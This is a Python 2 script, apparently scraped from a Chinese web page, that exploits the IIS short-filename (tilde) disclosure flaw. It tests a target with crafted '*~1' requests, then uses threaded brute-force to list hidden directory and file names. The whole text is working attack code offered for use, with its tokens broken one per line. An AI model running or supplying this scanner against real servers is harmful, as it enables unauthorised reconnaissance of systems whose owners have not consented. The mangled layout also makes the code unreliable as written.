#!/usr/bin/env python
# -*- coding: utf-8 -*-
import
sys
import
httplib
import
urlparse
import
string
import
threading
import
Queue
import
time
import
string
class
Scanner():
def
__init__(
self
, target):
self
.target
=
target
self
.scheme,
self
.netloc,
self
.path, params, query, fragment
=
urlparse.urlparse(target)
if
self
.path[
-
1
:] !
=
'/'
:
# ends with slash
self
.path
+
=
'/'
self
.payloads
=
list
(
'abcdefghijklmnopqrstuvwxyz0123456789_-'
)
self
.files
=
[]
self
.dirs
=
[]
self
.queue
=
Queue.Queue()
self
.lock
=
threading.Lock()
self
.threads
=
[]
def
_conn(
self
):
try
:
if
self
.scheme
=
=
'https'
:
conn
=
httplib.HTTPSConnection(
self
.netloc)
else
:
conn
=
httplib.HTTPConnection(
self
.netloc)
return
conn
except
Exception, e:
print
'[Exception in function _conn]'
, e
return
None
# fetch http response status code
def
_get_status(
self
, path):
try
:
conn
=
self
._conn()
conn.request(
'GET'
, path)
status
=
conn.getresponse().status
conn.close()
return
status
except
Exception, e:
raise
Exception(
'[Exception in function _get_status] %s'
%
str
(e) )
# test weather the server is vulerable
def
is_vul(
self
):
try
:
status_1
=
self
._get_status(
self
.path
+
'/*~1****/a.aspx'
)
# an existed file/folder
status_2
=
self
._get_status(
self
.path
+
'/san1e*~1****/a.aspx'
)
# not existed file/folder
if
status_1
=
=
404
and
status_2
=
=
400
:
return
True
return
False
except
Exception, e:
raise
Exception(
'[Exception in function is_val] %s'
%
str
(e) )
def
run(
self
):
# start from root path
for
payload
in
self
.payloads:
self
.queue.put( (
self
.path
+
payload,
'****'
) )
# filename, extention
for
i
in
range
(
10
):
t
=
threading.Thread(target
=
self
._scan_worker)
self
.threads.append(t)
t.start()
def
report(
self
):
for
t
in
self
.threads:
t.join()
self
._print(
'-'
*
64
)
for
d
in
self
.dirs:
self
._print(
'Dir: '
+
d)
for
f
in
self
.files:
self
._print(
'File: '
+
f)
self
._print(
'-'
*
64
)
self
._print(
'%d Directories, %d Files found in toal'
%
(
len
(
self
.dirs),
len
(
self
.files)) )
def
_print(
self
, msg):
self
.lock.acquire()
print
msg
self
.lock.release()
def
_scan_worker(
self
):
while
True
:
try
:
url, ext
=
self
.queue.get(timeout
=
3
)
status
=
self
._get_status(url
+
'*~1'
+
ext
+
'/1.aspx'
)
if
status
=
=
404
:
self
._print(
'Found '
+
url
+
ext
+
' [scan in progress]'
)
if
len
(url)
-
len
(
self
.path)<
6
:
# enum first 6 chars only
for
payload
in
self
.payloads:
self
.queue.put( (url
+
payload, ext) )
else
:
if
ext
=
=
'****'
:
# begin to scan extention
for
payload
in
string.ascii_lowercase:
self
.queue.put( (url,
'*'
+
payload
+
'**'
) )
self
.queue.put( (url,'') )
# also it can be a folder
elif
ext.count(
'*'
)
=
=
3
:
for
payload
in
string.ascii_lowercase:
self
.queue.put( (url,
'*'
+
ext[
1
]
+
payload
+
'*'
) )
elif
ext.count(
'*'
)
=
=
2
:
for
payload
in
string.ascii_lowercase:
self
.queue.put( (url,
'*'
+
ext[
1
]
+
ext[
2
]
+
payload ) )
elif
ext
=
=
'':
self
.dirs.append(url
+
'~1'
)
self
._print(
'Found Dir '
+
url
+
'~1 [Done]'
)
elif
ext.count(
'*'
)
=
=
1
:
self
.files.append(url
+
'~1.'
+
ext[
1
:])
self
._print(
'Found File '
+
url
+
'~1.'
+
ext[
1
:]
+
' [Done]'
)
except
Exception,e:
break
if
len
(sys.argv)
=
=
1
:
print
'Usage: %s target'
%
sys.argv[
0
]
sys.exit()
target
=
sys.argv[
1
]
s
=
Scanner(target)
if
not
s.is_vul():
print
'Sorry, server is not vulerable'
sys.exit(
0
)
print
'server is vulerable, please wait, scanning...'
s.run()
s.report()
运行截图: